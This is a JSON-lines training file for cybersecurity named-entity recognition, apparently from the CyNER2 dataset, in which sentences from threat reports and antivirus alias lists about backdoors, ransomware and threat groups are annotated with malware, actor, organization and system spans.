{"text": "A backdoor also known as: W32.FamVT.Cosmu.PE Win32.Worm.VB.NZQ Trojan.Win32.Cosmu!O W32.Lamer.EL3 Downloader.VB.Win32.95 Trojan/Downloader.VB.eex Win32.Virus.VBbind.a W32.Besverit Win32/VB.JU TROJ_DLOADR.SMM Win.Trojan.Cosmu-4 Virus.Win32.Lamer.el Win32.Worm.VB.NZQ Trojan.Win32.VB.ltch Troj.Downloader.W32.VB.l4ji Worm.Win32.VB.kp Win32.Worm.VB.NZQ Win32.Worm.VB.NZQ Win32.HLLW.Autoruner.6014 TROJ_DLOADR.SMM BehavesLike.Win32.Autorun.th Trojan/Cosmu.lan Trojan.Win32.Cosmu.887991 Virus.Win32.Lamer.el Win32.Worm.VB.NZQ Win32/Lamer.D Win32.Worm.VB.NZQ SIM.Trojan.VBO.0859 Trojan.Downloader Win32/VB.NUP Worm.Win32 W32/AutoRun.RPV!worm W32/OverDoom.A Virus.Win32.Lamer.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001123", "source": "cyner2_train"}}
{"text": "This mechanism is similar to premium rate SMS messages but Trojans do not need to send any SMS in this case – they just need to click on a button on a web-page with WAP-billing.", "spans": {"MALWARE: Trojans": [[59, 66]]}, "info": {"id": "cyner2_train_001124", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Keylogger.88 Win32.Backdoor.Ciadoor.13.y.2.Pack Backdoor/Ciadoor.13 Backdoor.Ciadoor!4PAHfVwkIvk W32/BackdoorX.FCC Backdoor.Ciadoor Win32/Ciadoor.J BKDR_CIADOOR.E Win32.Stration Backdoor.Win32.Ciadoor.cia Trojan.Keylogger.88 Backdoor.Win32.Ciadoor.13 Trojan.Keylogger.88 Trojan.DownLoader.62487 BDS/Ciadoor.13.A BKDR_CIADOOR.E Backdoor.Win32.Ciadoor!IK Backdoor/Ciadoor.az Backdoor/Win32.Ciadoor VirTool:Win32/VB.L Backdoor.Win32.Ciadoor.60726 Trojan.Keylogger.88 W32/BackdoorX.FCC OScope.Backdoor.VB Win32/Ciadoor.13 Backdoor.Win32.Ciadoor W32/Ciadoor.13!tr.bdr BackDoor.Ciadoor.3.AH Bck/Ciadoor.FQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001127", "source": "cyner2_train"}}
{"text": "Indicators for the TripleNine backdoor used by an actor.", "spans": {"MALWARE: TripleNine backdoor": [[19, 38]], "THREAT_ACTOR: actor.": [[50, 56]]}, "info": {"id": "cyner2_train_001128", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pakes Troj.W32.Pakes!c Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.ZCVD-4026 Trojan.Win32.Encoder.euxeay Trojan.Encoder.15133 Trojan.Pakes.Win32.41830 Trojan.Win32.Injector Backdoor.Backboot.s TR/Crypt.Xpack.frnur W32/Injector.DSRQ!tr Trojan.Graftor.D67C49 Ransom:Win32/Criakl.D Backdoor.Backboot Ransom.FileCryptor Trj/GdSda.A Trojan.Pakes!3sBO8Lnk+/0 Win32/Trojan.7d4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001129", "source": "cyner2_train"}}
{"text": "Some of the stolen Skype databases included chat history going back to 2012 and activity as recent as January 2014", "spans": {"SYSTEM: Skype databases": [[19, 34]]}, "info": {"id": "cyner2_train_001130", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Rootkit.Win32.Xanfpezes!O Trojan.Rootkitdrv Rootkit.Xanfpezes.Win32.13 Trojan/Xanfpezes.bru Trojan.Symmi.DC01B Win32.Trojan.WisdomEyes.16070401.9500.9873 W32/Trojan.VQCP-2977 Win32/Rootkit.KX RTKT_HIDEPROC.BB Win.Trojan.Hideproc-77 Rootkit.Win32.Xanfpezes.bru Riskware.Win32.HideProc.crvalg Trojan.Fakealert.28173 RTKT_HIDEPROC.BB BehavesLike.Win32.PUP.wc Downloader.Delphi TrojanDropper.Delf.cdq RiskWare[RiskTool]/Win32.HideProc Win32.Hack.Rootkit.kcloud Rootkit.Win32.Xanfpezes.bru Backdoor/Win32.Xanfpezes.C131817 TrojanDownloader.Banload HackTool.Win32.ProcHide.ad Rootkit.Xanfpezes!kqbV3Mm24ww", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001131", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Nsis.Ocna.eqkruk Trojan.InstallCoreCRTD.Win32.3467 Win32/RA-based.AB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001132", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Mariofev.O Win32.Worm.Mariofev.O WORM_MARIOFEV.TO Win32.Trojan.WisdomEyes.16070401.9500.9961 W32/Backdoor2.CSNQ W32.Spamuzle WORM_MARIOFEV.TO Win.Spyware.53855-2 Worm.Win32.Pinit.piv Win32.Worm.Mariofev.O Trojan.Win32.Pinit.bmcqcd W32.W.Pinit.piv!c Win32.Worm.Pinit.Ljul Win32.Worm.Mariofev.O Win32.Worm.Mariofev.O BackDoor.Zapinit.81 BehavesLike.Win32.VTFlooder.nc Trojan-Ransom.HydraCrypt W32/Backdoor.CNPZ-8382 TrojanDropper:Win32/Mariofev.H Worm.Win32.Pinit.piv Worm.Pinit Worm.Mariofev!HCn84tcMG2k", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001133", "source": "cyner2_train"}}
{"text": "Readers who are interested in this campaign should start with our first blog that lays out the overall functionality of the malware and introduces its many components.", "spans": {"THREAT_ACTOR: campaign": [[35, 43]], "MALWARE: malware": [[124, 131]]}, "info": {"id": "cyner2_train_001135", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Novel.DOS.1 PSW.Novel TROJ_PSWNOVEL.A Trojan-PSW.DOS.Novel Trojan.Dos.Novel.fnqs DOS.S.PSWNovel.7120 Troj.PSW.DOS.Novel!c TrojWare.PSW.Novel TROJ_PSWNOVEL.A Trojan/PSW.Novel TR/PSW.Novel Trojan[PSW]/DOS.Novel Trojan-PSW.DOS.Novel Login.7120 Dos.Trojan-qqpass.Qqrob.Aenr W32/HLLW_NewStory.A!tr.pws Win32/Trojan.99d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001137", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Losicoa.S18597 Trojan.Zusy.D39F92 TrojanDownloader:Win32/Qdownb.A Trojan.Win32.BHO Win32/Trojan.cb1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001138", "source": "cyner2_train"}}
{"text": "The group effectively controls an arsenal of over 85 million mobile devices around the world.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "SYSTEM: mobile devices": [[61, 75]]}, "info": {"id": "cyner2_train_001139", "source": "cyner2_train"}}
{"text": "Last week, a new version was spotted in the wild, and based on our analysis, we believe that this variant is the one used in a recent attack against San Francisco Municipal Transport Agency SFMTA.", "spans": {"MALWARE: variant": [[98, 105]], "ORGANIZATION: San Francisco Municipal Transport Agency SFMTA.": [[149, 196]]}, "info": {"id": "cyner2_train_001140", "source": "cyner2_train"}}
{"text": "We observed 3 squatting domain registrations related to a victim in the media sector.", "spans": {"ORGANIZATION: victim": [[58, 64]], "ORGANIZATION: the media sector.": [[68, 85]]}, "info": {"id": "cyner2_train_001143", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D1558E Win32.Trojan.WisdomEyes.16070401.9500.9566 Trojan.MSIL.Crypt W32/Trojan.UXDY-5009 TR/Kryptik.udtxo TrojanDropper:MSIL/Vibes.A Trj/GdSda.A MSIL/Kryptik.GXI!tr Win32/Trojan.855", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001144", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 PowerShell.DownLoader.36 BehavesLike.Win32.Trojan.dh Trojan-Dropper.PowerShell.Ploty W32/Trojan.ZKDA-3628 TrojanDropper:PowerShell/Ploty.C Trj/CI.A JS/Psdl.A!tr.dldr Win32/Trojan.f31", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001145", "source": "cyner2_train"}}
{"text": "Analysis of HackingTeam Android malware", "spans": {"ORGANIZATION: HackingTeam": [[12, 23]], "MALWARE: Android malware": [[24, 39]]}, "info": {"id": "cyner2_train_001146", "source": "cyner2_train"}}
{"text": "We refer to this backdoor as T9000, which is a newer variant of the T5000 malware family, also known as Plat1.", "spans": {"MALWARE: backdoor": [[17, 25]], "MALWARE: T9000,": [[29, 35]], "MALWARE: variant": [[53, 60]], "MALWARE: T5000 malware family,": [[68, 89]], "MALWARE: Plat1.": [[104, 110]]}, "info": {"id": "cyner2_train_001147", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Pottieq Win32.Trojan.WisdomEyes.16070401.9500.9786 Trojan.Win32.Aura.evxqqg Trojan.Encoder.2667 BehavesLike.Win32.BadFile.th TrojanDropper.FrauDrop.annq Trojan[Ransom]/Win32.Aura Ransom:Win32/Pottieq.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001150", "source": "cyner2_train"}}
{"text": "The Trapwot malware family is considered scareware or rogue antivirus because it attempts to mislead victims into believing their machine is infected with malware.", "spans": {"MALWARE: Trapwot malware family": [[4, 26]], "MALWARE: scareware": [[41, 50]], "MALWARE: rogue antivirus": [[54, 69]], "SYSTEM: machine": [[130, 137]]}, "info": {"id": "cyner2_train_001152", "source": "cyner2_train"}}
{"text": "In comparison to other threat groups, TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger.", "spans": {"THREAT_ACTOR: threat groups, TG-3390": [[23, 45]], "SYSTEM: Microsoft Exchange servers": [[88, 114]], "MALWARE: custom backdoor": [[123, 138]], "MALWARE: credential logger.": [[143, 161]]}, "info": {"id": "cyner2_train_001153", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer Win32.Trojan.WisdomEyes.16070401.9500.9999 MSIL.Packed.Skaldring.D Win32.Trojan.Fsysna.Hwwo Trojan.DownLoader14.15241 BehavesLike.Win32.Trojan.cc Trojan.Crypt TR/Dropper.MSIL.rpjh Trojan.Barys.DCAFA Trojan:Win32/Bshan.A Trojan.Fsysna! MSIL/Injector.PKZ!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001155", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Alien Trojan.Zusy.D3E06C Win32.Trojan.WisdomEyes.16070401.9500.9952 Worm.Win32.Alien.oe W32/Trojan.RDLO-7674 WORM/Alien.ugxeq TrojanDownloader:VBS/Kaloki.A Worm.Win32.Alien.oe Trj/CI.A Win32/Trojan.9de", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001157", "source": "cyner2_train"}}
{"text": "The malware was included as an attachment intended to trick the user into opening the malware.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: malware.": [[86, 94]]}, "info": {"id": "cyner2_train_001158", "source": "cyner2_train"}}
{"text": "Cybercriminals, however, are equal opportunity exploiters, so just recently an interesting targeted malware campaign was found to be using another document vulnerability.", "spans": {"THREAT_ACTOR: Cybercriminals,": [[0, 15]], "THREAT_ACTOR: exploiters,": [[47, 58]], "THREAT_ACTOR: malware campaign": [[100, 116]], "VULNERABILITY: vulnerability.": [[156, 170]]}, "info": {"id": "cyner2_train_001159", "source": "cyner2_train"}}
{"text": "The backdoor code was found between Display Widgets version 2.6.1 released June 30 and version 2.6.3 released September 2.", "spans": {}, "info": {"id": "cyner2_train_001160", "source": "cyner2_train"}}
{"text": "However, over the past few years, we have been tracking a separate, less widely known suspected Iranian group with potential destructive capabilities, whom we call APT33.", "spans": {"THREAT_ACTOR: Iranian group": [[96, 109]], "THREAT_ACTOR: APT33.": [[164, 170]]}, "info": {"id": "cyner2_train_001162", "source": "cyner2_train"}}
{"text": "If the registration is successful, it uses the received unique identifier to further communicate with the C&C server and receive commands.", "spans": {}, "info": {"id": "cyner2_train_001164", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Avosim Backdoor.Trojan W32/Trojan.BPEV-1033 BDS/Avosim.azmiq W32/ISMdoor.5E1D!tr Trj/GdSda.A Win32/Backdoor.ed0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001165", "source": "cyner2_train"}}
{"text": "run a malicious DEX file without notification,", "spans": {"MALWARE: malicious": [[6, 15]]}, "info": {"id": "cyner2_train_001166", "source": "cyner2_train"}}
{"text": "A further blog by FireEye titled Acknowledgement of Attacks Leveraging Microsoft Zero-Day provided additional useful information.", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "VULNERABILITY: Leveraging Microsoft Zero-Day": [[60, 89]]}, "info": {"id": "cyner2_train_001168", "source": "cyner2_train"}}
{"text": "The Sage ransomware variant appears to have been out of circulation for a while in the malware scene.", "spans": {"MALWARE: The Sage ransomware variant": [[0, 27]], "MALWARE: malware": [[87, 94]]}, "info": {"id": "cyner2_train_001170", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PDF/Trojan.PGPW-0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001171", "source": "cyner2_train"}}
{"text": "After further research, we found the malware has been repackaged into several pirated iOS apps that are available for download via multiple channels.", "spans": {"MALWARE: malware": [[37, 44]]}, "info": {"id": "cyner2_train_001172", "source": "cyner2_train"}}
{"text": "Crypt0l0cker has gone through a long evolution, the adversaries are updating and improving the malware on a regular basis.", "spans": {"MALWARE: Crypt0l0cker": [[0, 12]], "THREAT_ACTOR: the adversaries": [[48, 63]], "MALWARE: malware": [[95, 102]]}, "info": {"id": "cyner2_train_001173", "source": "cyner2_train"}}
{"text": "The Sofacy group, also known as APT28 and Sednit, is a fairly well known cyber espionage group believed to have ties to Russia.", "spans": {"THREAT_ACTOR: The Sofacy group,": [[0, 17]], "THREAT_ACTOR: APT28": [[32, 37]], "THREAT_ACTOR: Sednit,": [[42, 49]], "THREAT_ACTOR: cyber espionage group": [[73, 94]]}, "info": {"id": "cyner2_train_001177", "source": "cyner2_train"}}
{"text": "Even harder is when you do not receive telemetry data from products that contains information about infected machines.", "spans": {"SYSTEM: infected machines.": [[100, 118]]}, "info": {"id": "cyner2_train_001178", "source": "cyner2_train"}}
{"text": "What is more, they are tied to the attacked applications, which creates an illusion that they are legitimate and belong to the corresponding software.", "spans": {"SYSTEM: applications,": [[44, 57]]}, "info": {"id": "cyner2_train_001180", "source": "cyner2_train"}}
{"text": "However, there are several good reasons for an attacker to use this particular feature.", "spans": {"THREAT_ACTOR: attacker": [[47, 55]], "VULNERABILITY: feature.": [[79, 87]]}, "info": {"id": "cyner2_train_001181", "source": "cyner2_train"}}
{"text": "NCC Group is monitoring a number of OOXML and RTF techniques our red team has been using since September 2016, which uncovered multiple malicious documents from around August 2017.", "spans": {"ORGANIZATION: NCC Group": [[0, 9]], "ORGANIZATION: red team": [[65, 73]]}, "info": {"id": "cyner2_train_001182", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32.Sality!O Tool.Transmit.Win32.60 Win32.Trojan.WisdomEyes.16070401.9500.9549 not-a-virus:NetTool.Win32.Transmit.a Riskware.Win32.Transmit.exlakv Trojan.Win32.Z.Transmit.67795 Backdoor.Win32.VanBot.24 Tool.Transmit BehavesLike.Win32.VirRansom.kc Trojan/Pakes.emd not-a-virus:NetTool.Win32.Transmit.a Trj/CI.A Trojan.TenThief.DNFTrojan.tnh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001185", "source": "cyner2_train"}}
{"text": "The attacks leveraged a malware named EyePyramid to target a dozen politicians, bankers, prominent freemasons and law enforcement personalities in Italy.", "spans": {"MALWARE: malware": [[24, 31]], "MALWARE: EyePyramid": [[38, 48]], "ORGANIZATION: politicians, bankers, prominent freemasons": [[67, 109]], "ORGANIZATION: law enforcement personalities": [[114, 143]]}, "info": {"id": "cyner2_train_001186", "source": "cyner2_train"}}
{"text": "Recently, we've seen a number of reports related to 9002 remote access Trojan RAT.", "spans": {"MALWARE: 9002 remote access Trojan RAT.": [[52, 82]]}, "info": {"id": "cyner2_train_001187", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kadena.B4 Trojan.Ipatre.1 Win32.Trojan.Kryptik.lx TROJ_UPATRE.SMX7 Win32.Trojan.Kryptik.CI Trojan.Win32.Kryptik.expevv Trojan.Win32.Z.Upatre.71168.AI TrojWare.Win32.TrojanDownloader.Upatre.EMD Trojan.DownLoader26.15470 TROJ_UPATRE.SMX7 W32/Trojan.DPWC-8231 TR/Crypt.ZPACK.karjs Trojan/Win32.Upatre.R160419 Trojan-Downloader.Win32.Waski W32/Kryptic.ABGK!tr Win32/Trojan.8c5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001188", "source": "cyner2_train"}}
{"text": "When clicked it launches an infection chain made up of JavaScript, and a final shellcode payload that makes use of DNS to load additional shellcode from a remote command and control server.", "spans": {"SYSTEM: DNS": [[115, 118]], "MALWARE: shellcode": [[138, 147]]}, "info": {"id": "cyner2_train_001191", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.IRC.MRAK.A Virus.Win32.Mkar!O W32.Mkar.A4 Backdoor.IRC.MRAK.A Virus.Mkar.Win32.5 Backdoor.IRC.MRAK.A Win32.Trojan.WisdomEyes.16070401.9500.9981 W32/Mkar.C W32.Marak PE_MKAR.A.DAM Win.Trojan.Mkar-3 Virus.Win32.Mkar.a Backdoor.IRC.MRAK.A Virus.Win32.Mkar.cyau Backdoor.IRC.MRAK.A Win32.Mkar.A Backdoor.IRC.MRAK.A Win32.HLLP.Mrak.9 PE_MKAR.A.DAM BehavesLike.Win32.Koobface.mc W32/Mkar.LNJG-1026 WORM/Mkar.A Backdoor:Win32/Mkar.A Win32.Mrak.A Virus.Win32.Mkar.a Backdoor.IRC.MRAK.A Malware/Win32.Mkar.C408081 Win32/Mkar.A Win32.Mkar.E Virus.Win32.Mkar W32/Mkar.D W32/Mkar.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001192", "source": "cyner2_train"}}
{"text": "CrowdStrike Services Inc., our Incident Response group, was called by the Democratic National Committee DNC, the formal governing body for the US Democratic Party, to respond to a suspected breach.", "spans": {"ORGANIZATION: CrowdStrike Services Inc.,": [[0, 26]], "ORGANIZATION: the Democratic National Committee": [[70, 103]], "ORGANIZATION: formal governing body": [[113, 134]], "ORGANIZATION: US Democratic Party,": [[143, 163]]}, "info": {"id": "cyner2_train_001193", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Buzus.32878.D TrojanDownloader.Small.grk Trojan/Downloader.Small.grk Trojan.DL.Small.ALEE Win32/SlhBack.B W32/Downldr2.BDIE W32/DLoader.DZIA Trojan.Downloader-20119 Trojan-Downloader.Win32.Small.grk Trojan.Downloader.Delf.OJS Backdoor.Win32.SlhBack.B Trojan.Downloader.Delf.OJS Trojan.DownLoader.50258 TR/Dldr.Small.grk.24 TROJ_DELF.HXO Heuristic.BehavesLike.Win32.Backdoor.H Win32/SillyDl.ETL W32/Downldr2.BDIE TrojanDownloader.Small.zhn Trojan-PWS.Win32.OnLineGames!IK TrojanDownloader:Win32/Small.AAAL Trojan.Win32.Downloader.35496 Trojan.Downloader.Delf.OJS Win-Trojan/Downloader.32877 Trojan-Downloader.Win32.Small.grk Trojan.DL.Small.AJEZ Trojan.DL.Win32.Small.grk Trojan-PWS.Win32.OnLineGames W32/Small.GRK!tr Trj/Downloader.REB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001194", "source": "cyner2_train"}}
{"text": "The McAfee Labs research team has tracked an advanced persistent threat for the past couple of months.", "spans": {"ORGANIZATION: McAfee Labs research team": [[4, 29]], "THREAT_ACTOR: advanced persistent threat": [[45, 71]]}, "info": {"id": "cyner2_train_001196", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Vilsel!O BackDoor-EZO.a Trojan/Bewymids.a Trojan.Vilsel!fjBL+ssgwjs Infostealer.Hoardy Win.Trojan.Vilsel-265 Trojan.Win32.Vilsel.aybc Trojan.Win32.Vilsel.djwjt Trojan.Win32.S.Vilsel.61544[h] Trojan.DownLoader2.44985 Trojan.Vilsel.Win32.20666 BehavesLike.Win32.Downloader.km Trojan/Vilsel.uxx TR/Bewymids.A.2 Trojan/Win32.Vilsel Win32.Troj.Vilsel.kcloud Trojan:Win32/Bewymids.A Trojan/Win32.Vilsel Spyware.Infostealer.Flea.APT Trojan.Vilsel Win32.Trojan.Vilsel.Phqe Trojan.Win32.Vilsel W32/Vilsel.AYBC!tr Trojan.Win32.Bewymids.BA Win32/Trojan.bab", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001199", "source": "cyner2_train"}}
{"text": "As the attack is currently active, it effectively turns compromised sites into attack surfaces against their visitors.", "spans": {"ORGANIZATION: visitors.": [[109, 118]]}, "info": {"id": "cyner2_train_001200", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Stegvob.C9 Win32.Trojan-Downloader.Delf.c WORM_TOPHOS.BKD Trojan.Win32.Dropper.aas Win32.HLLW.Tophos.1 WORM_TOPHOS.BKD Trojan.Symmi.DD7FE Worm:Win32/Tophos.B BScope.Worm.Tophos.2612 Backdoor.Bot Virus.Win32.Sality W32/Tophos.AAA!tr Win32/Trojan.278", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001201", "source": "cyner2_train"}}
{"text": "Aside from stealing keystrokes, passwords, Bitcoins, system information, and files on disk, NionSpy also known as Mewsei and MewsSpy can record video using the webcam, audio using the microphone, take screenshots, and use infected machines as a proxy tunnel to connect to other machines within the network.", "spans": {"MALWARE: NionSpy": [[92, 99]], "MALWARE: Mewsei": [[114, 120]], "MALWARE: MewsSpy": [[125, 132]], "SYSTEM: machines": [[231, 239], [278, 286]], "SYSTEM: network.": [[298, 306]]}, "info": {"id": "cyner2_train_001203", "source": "cyner2_train"}}
{"text": "The actors behind this adware utilize a simple yet effective approach – they download a popular, legitimate Android application, decompile it, add their malicious routines, then repackage the Android application package APK.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "MALWARE: adware": [[23, 29]], "SYSTEM: Android application,": [[108, 128]], "MALWARE: malicious routines,": [[153, 172]], "SYSTEM: the Android application package APK.": [[188, 224]]}, "info": {"id": "cyner2_train_001204", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.FlyStudio.Win32.19742 Trojan/FlyStudio.ooa Trojan.Zusy.D38745 Win32.Trojan.FlyStudio.we Win32.Application.PUPStudio.B Trojan.Win32.Dwn.eeopgy Trojan.DownLoader24.6094 Trojan.Win32.Antavmu TR/Winder.sbcde Trojan[Dropper]/Win32.Sysn Trojan:Win32/Winder.A RiskWare.GameHack Backdoor.Farfli!+OYA++JJfG8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001205", "source": "cyner2_train"}}
{"text": "#ISMDoor impersonates ZAHRANI an electrical equipment and engineering company in Saudi Arabia and ThetaRay.", "spans": {"MALWARE: #ISMDoor": [[0, 8]], "ORGANIZATION: ZAHRANI": [[22, 29]], "ORGANIZATION: electrical equipment": [[33, 53]], "ORGANIZATION: engineering company": [[58, 77]], "ORGANIZATION: ThetaRay.": [[98, 107]]}, "info": {"id": "cyner2_train_001206", "source": "cyner2_train"}}
{"text": "In the third intrusion, the Mandiant Incident Response team was contacted after UNC961 had compromised the victim and transferred access to UNC3966.", "spans": {"ORGANIZATION: the Mandiant Incident Response team": [[24, 59]], "THREAT_ACTOR: UNC961": [[80, 86]], "THREAT_ACTOR: UNC3966.": [[140, 148]]}, "info": {"id": "cyner2_train_001207", "source": "cyner2_train"}}
{"text": "Modification of KBOT from the Carberp leak.", "spans": {"MALWARE: KBOT": [[16, 20]], "MALWARE: Carberp": [[30, 37]]}, "info": {"id": "cyner2_train_001208", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Lossymem MSIL/Filecoder.LI Ransom_LTML.THAOJH Trojan.Win32.Ransom.ewugaq Ransom_LTML.THAOJH Trojan-Ransom.FileCoder W32/Trojan.QFKV-3532 TR/Ransom.xaclx Trojan/Win32.Ransom.C2353444 Trojan.Ransom.LongTermMemoryLoss Trj/GdSda.A MSIL.Trojan-Ransom.LTML.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001209", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Floxif.S1578425 Trojan.Rozena.Win32.59165 BKDR_CCHACK.A W32/CChack.A Trojan.Ccleaner BKDR_CCHACK.A Win.Spyware.CCBkdr-6336251-2 Win32.Backdoor.Forpivast.B Backdoor.Win32.InfeCleaner.a Trojan.PRForm.A Trojan.Win32.Floxif.estdxt Trojan.Win32.Z.Floxif.5000118 Trojan.PRForm.A Trojan.CCleaner.2 BehavesLike.Win32.Dropper.rc Backdoor.Hacked.CCleaner W32/CChack.SQBY-7641 Trojan[FakeAV]/Win32.CCleaner Backdoor.Win32.InfeCleaner.a Win-Trojan/Floxif.9791816 Backdoor.InfeCleaner Trj/CI.A Trojan.PRForm.A Win32.Backdoor.Infecleaner.Lkns Win32/Trojan.54c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001210", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exp.OLE.CVE-2015-1641.E Trojan.Mdropper Win32/Exploit.CVE-2015-1641.V TROJ_MDROP.YYSRH TROJ_MDROP.YYSRH RTF/Trojan.BTCC-93 Trojan[Exploit]/Win32.CVE-2015-1641 Exploit.CVE-2015-1641 Exploit.CVE-2015-1641", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001213", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Downloader.CXJ O97M.Drop.P W97M.Downloader.CXJ VBA.Trojan.Obfuscated.u VBA/Obfuscated.C W2KM_GOLROTED.AGG W97M.Downloader.CXJ W97M.Downloader.CXJ Trojan.Ole2.Vbs-heuristic.druvzi W97M.Downloader.CXJ W97M.Downloader.CXJ W97M.DownLoader.1033 W2KM_GOLROTED.AGG W97M.Downloader.CXJ WM/Obfuscated.C!tr virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001215", "source": "cyner2_train"}}
{"text": "A new custom backdoor used by the Mustang Panda APT group is targeting a governmental institution in Taiwan, according to ESET researchers who have analyzed samples of MQsTTang, a new type of malware.", "spans": {"MALWARE: new custom backdoor": [[2, 21]], "THREAT_ACTOR: Mustang Panda APT group": [[34, 57]], "ORGANIZATION: a governmental institution": [[71, 97]], "ORGANIZATION: ESET researchers": [[122, 138]], "MALWARE: MQsTTang,": [[168, 177]], "MALWARE: malware.": [[192, 200]]}, "info": {"id": "cyner2_train_001216", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9970 Backdoor.Trojan.B Win.Trojan.10430800-1 Trojan.Win32.Pugeshe.ctexqh BDS/Pugeshe.A.2 Trj/Ziyang.A Win32.Backdoor.Pugeshe.Phzt Trojan.Ziyanzho!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001217", "source": "cyner2_train"}}
{"text": "The original code of BankBot was divulged on a Russian forum in late 2016, and you can read more about that here.", "spans": {"MALWARE: The original code": [[0, 17]], "MALWARE: BankBot": [[21, 28]], "THREAT_ACTOR: a Russian forum": [[45, 60]]}, "info": {"id": "cyner2_train_001218", "source": "cyner2_train"}}
{"text": "Based on observations on infrastructure, and the state of the code, we believe these incidents represent the first attempts to deploy the agent, and features such as persistence do not appear to work.", "spans": {"SYSTEM: infrastructure,": [[25, 40]], "MALWARE: agent,": [[138, 144]]}, "info": {"id": "cyner2_train_001219", "source": "cyner2_train"}}
{"text": "The malware contains an old school exclusion list that performs extremely rapid double word comparisons rather than the slower but far more common string comparisons to identify which process to ignore, and internally validates the identified account data through an implementation of the Luhn algorithm.", "spans": {"MALWARE: malware": [[4, 11]]}, "info": {"id": "cyner2_train_001221", "source": "cyner2_train"}}
{"text": "Symantec's latest whitepaper documents multiple Black Vine operations that have been occurring since 2012.", "spans": {"ORGANIZATION: Symantec's": [[0, 10]], "THREAT_ACTOR: Black Vine operations": [[48, 69]]}, "info": {"id": "cyner2_train_001223", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HT_BLADABINDI_GL190001.UVPM HT_BLADABINDI_GL190001.UVPM Backdoor.MSIL.Bladabindi.alfk Trojan.Win32.Bladabindi.exqcus Ht.Bladabindi.Gl190001!c BehavesLike.Win32.Dropper.wc Trojan:Win32/Trogle.A Backdoor.MSIL.Bladabindi.alfk Trj/CI.A Msil.Backdoor.Bladabindi.Tbsy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001224", "source": "cyner2_train"}}
